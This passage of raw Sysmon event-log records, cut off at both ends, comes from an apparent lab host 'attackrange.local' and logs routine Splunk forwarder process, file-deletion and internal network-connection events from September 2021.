Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x800000000000000035129027Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 22:00:40.392{B81B27B7-8408-613A-EE96-03000000C801}5132C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2C:\Windows\system32\NT AUTHORITY\SYSTEM{B81B27B7-4012-611D-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{B81B27B7-4013-611D-2700-00000000C801}2076C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x800000000000000035129057Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 22:00:41.605{B81B27B7-4014-611D-3000-00000000C801}31443164C:\Windows\system32\conhost.exe{B81B27B7-8409-613A-F096-03000000C801}4132C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035129056Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 22:00:41.605{B81B27B7-4012-611D-0C00-00000000C801}7324308C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035129055Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 22:00:41.605{B81B27B7-4012-611D-0C00-00000000C801}7324308C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035129054Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 22:00:41.605{B81B27B7-4012-611D-0C00-00000000C801}7324308C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035129053Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 22:00:41.605{B81B27B7-4012-611D-0C00-00000000C801}7324308C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035129052Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 22:00:41.605{B81B27B7-4012-611D-0500-00000000C801}420436C:\Windows\system32\csrss.exe{B81B27B7-8409-613A-F096-03000000C801}4132C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000035129051Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 22:00:41.605{B81B27B7-4013-611D-2700-00000000C801}20763760C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{B81B27B7-8409-613A-F096-03000000C801}4132C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x800000000000000035129050Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 22:00:41.592{B81B27B7-8409-613A-F096-03000000C801}4132C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe8.0.2Windows Print Monitor splunk ApplicationSplunk Inc.splunk-winprintmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{B81B27B7-4012-611D-E703-000000000000}0x3e70SystemMD5=36D3753920C5BBCA16D12DEAD7A3A904,SHA256=EA17F69FB116CFA6ADC3CE07EBBAE3FD2CB221F25E3F7A9ADF3F15DA051831E2,IMPHASH=264D4B9546D98D77D97F569F55A0B748{B81B27B7-4013-611D-2700-00000000C801}2076C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x800000000000000035129049Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 22:00:41.543{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=187DBD9DA30B01D89CE4BD916EB5B1F0,SHA256=739D5F4660CE59DBF5D930097D14322C47247A2402366709EA9328D63E94A266,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035129048Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 22:00:41.459{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=6F1444E1851E9169775621564D2BF38E,SHA256=4A37671FB106A691084E883A2DBBFAC7568A13DBE35486355435E4D2907F3771,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 10341000x800000000000000035129047Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 22:00:41.143{B81B27B7-8408-613A-EF96-03000000C801}55201224C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe{B81B27B7-4013-611D-2700-00000000C801}2076C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+5691a5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+568cd6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56657|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56ca7|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+8f3800|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x800000000000000035129059Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 22:00:42.604{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=181DD9E18B16E71FD95CCCA28DD5DC6B,SHA256=66F0BFA008A7BB6751139D0CACEB68D92F9CCED850C7CB83521E8A60E823357C,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035129058Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 22:00:42.573{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=40E978AD0B5F5EC62521C293280CC871,SHA256=BE6A1C05509C06D362654A93EE23E5E4F9C3C62D906A6B61274541222D2FB2AC,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035129060Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 22:00:43.603{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0D3ACCF6AA497C47A726106A5E9A379A,SHA256=972E9BE012B8C57969D26719BB9097A1F1F4F84CA8B5A4D1E1F689B2D6655D86,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035129061Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 22:00:44.618{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=66CB54989A398B7E8E6DCADB65ADCB02,SHA256=9A1D5A95EBC5E8B0D7191E7D2499B931FC74B04C98EBB38D5109C2305598B37B,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035129062Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 22:00:45.622{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3747E3205BCFF94D4CE4E0C94D0BC76F,SHA256=B16FA95789E373A59EF15F995FD5796DFEC153301DB82CA994DCD570B85A4E4D,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035129064Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 22:00:46.640{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6E9E72A1C411697940E71A3067BD9A5B,SHA256=C221C28BFACA5EC391179AB4F3C907A4EBC5A3D05F2D239C4FE18EF923313027,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000035129063Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 22:01:10.239{B81B27B7-401D-611D-6900-00000000C801}3616C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-987.attackrange.local62227-false10.0.1.12-8000- 23542300x800000000000000035129065Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 22:00:47.655{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=53C4D305A8F3071249302C0407EB5FDA,SHA256=7B50B520DB0F63091A579552C1D3E118DE3E7D30B15CCB9E8A8DA53A8516292F,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035129066Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 22:00:48.669{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5B83CF7CF20F300F07A2AF6FCF5EDD1A,SHA256=A4009B21D3344C3F94E2C88833E0E365584A3B459F9C3CC51E74932ED7E9EA7D,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035129067Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 22:00:49.699{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7E05A62EBD0C415AA62D84E780D9C299,SHA256=7EECFEDF3BD86D28840F6CC5A72DDA9ED9F0B8B8A784D83AF9B2FDE8843E10D7,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035129068Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 22:00:50.735{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=645691DD68FCFB76E44182C5EA57405C,SHA256=89DAC8744108E156991C541E02E94E9DB6BD2970168925A83D1700F1BA08929F,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035129070Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 22:00:51.765{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=99B73B3F92580F95A5F4F045C11E6BA2,SHA256=FCA2C4E2B006E2D863E63072BF70B0B4C40A1BB4D076F16D4A359D99A9D06108,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000035129069Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 22:01:15.283{B81B27B7-401D-611D-6900-00000000C801}3616C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-987.attackrange.local62228-false10.0.1.12-8000- 23542300x800000000000000035129071Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 22:00:52.795{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A6B11C90A1487CBE63E78299551AA497,SHA256=70E4524C6EE3594A7415AD4CE4D0C156A64BD7D6BA1BEB64A649E75FC1C8AEAA,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035129072Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 22:00:53.812{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=CF6B6F01FAB0C24314C317CF72436337,SHA256=F3019883B4A79C1A022CF7759802F2EB0BE7A617FFB70CD9567700DFFB69D0D4,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035129073Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 22:00:54.910{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=8DC19FA74C31FF29CF3473EB556D5B1A,SHA256=7CB534AEB1396870859E45F0F99FA886BA0B0E76F390C81401E322F2BFEC3C34,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035129074Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 22:00:55.929{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0066659E6F5D33D3E91B632BFCC9408C,SHA256=BF88BD3DB85E4CA4CF8D5A03DA0171F35059F53982EA87A4976576BB9C148C31,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035129075Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 22:00:56.943{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1C5137895D9D953EA05059BE0E0EF32A,SHA256=158ADE5C35A5E2FC7FC35C1B06B1EFC61D79735A0827B8C33C3F7C1AD935FFBE,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035129077Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 22:00:57.957{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E3FE0FF3F9A3C47332A49FB3A3D983C2,SHA256=B17FAE80EC302A106C9B09380D833E06883A37F1645CD54AB82C31BE8668F61E,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000035129076Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 22:01:21.230{B81B27B7-401D-611D-6900-00000000C801}3616C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-987.attackrange.local62229-false10.0.1.12-8000- 23542300x800000000000000035129078Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 22:00:58.972{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3F07E92B72FC7A23B24AB4425AE5DE53,SHA256=CF80DD77682017EFC6D5CEE848A60F2C4C4059D874B3B44AF6BB2745FC4A1750,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 10341000x800000000000000035129079Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 22:00:59.624{B81B27B7-4012-611D-0B00-00000000C801}636288C:\Windows\system32\lsass.exe{B81B27B7-400F-611D-0100-00000000C801}4System0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\kerberos.DLL+96fe2|C:\Windows\system32\kerberos.DLL+794d4|C:\Windows\system32\kerberos.DLL+144c9|C:\Windows\system32\lsasrv.dll+2d231|C:\Windows\system32\lsasrv.dll+2b3f4|C:\Windows\system32\lsasrv.dll+30949|C:\Windows\system32\lsasrv.dll+2e2a7|C:\Windows\system32\lsasrv.dll+2d231|C:\Windows\system32\lsasrv.dll+15e0d|C:\Windows\SYSTEM32\SspiSrv.dll+1a96|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e 23542300x800000000000000035129082Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 22:01:00.423{B81B27B7-8406-613A-ED96-03000000C801}2844ATTACKRANGE\REED_SCHMIDTC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\reed_schmidt\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveMD5=446DD1CF97EABA21CF14D03AEBC79F27,SHA256=A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035129081Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 22:01:00.108{B81B27B7-4013-611D-2700-00000000C801}2076NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeC:\Program Files\SplunkUniversalForwarder\var\run\serverclass.xmlMD5=9D45E1BDB6F237A6CF51FFC6A12E6130,SHA256=87EEE278CDF62B2B86AF9CB87BDB04BAFB10272CEA175D83979B0C43158C5AB9,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035129080Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 22:01:00.006{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6304A84FADD0665B8D1911149B5A3E2C,SHA256=AEFA5C226D7A912E2D169B84676B3689B866B3CD9CA389195091ABA72BE12D0E,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000035129089Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 22:01:26.354{B81B27B7-401D-611D-6900-00000000C801}3616C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-987.attackrange.local62232-false10.0.1.12-8000- 354300x800000000000000035129088Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 22:01:26.277{B81B27B7-4013-611D-2700-00000000C801}2076C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-987.attackrange.local62231-false10.0.1.12-8089- 354300x800000000000000035129087Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 22:01:25.810{B81B27B7-400F-611D-0100-00000000C801}4SystemNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-987.attackrange.local62230-false10.0.1.14WIN-DC-128445microsoft-ds 23542300x800000000000000035129086Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 22:01:01.458{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=D7F9378F7040404164EBE83F2A36FA7E,SHA256=3E9E0FC65E9F7AA4449CD6F29EA7A57FFCCEE978F0BB9A2C7388860CFF0C941C,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035129085Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 22:01:01.436{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=4F59DEE4083763A54CF4FA81AB8DA232,SHA256=CB1B6F2232A48302959C5DA03403487C04D5055ADF9231F1F03FE6701426868B,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035129084Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 22:01:01.436{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program 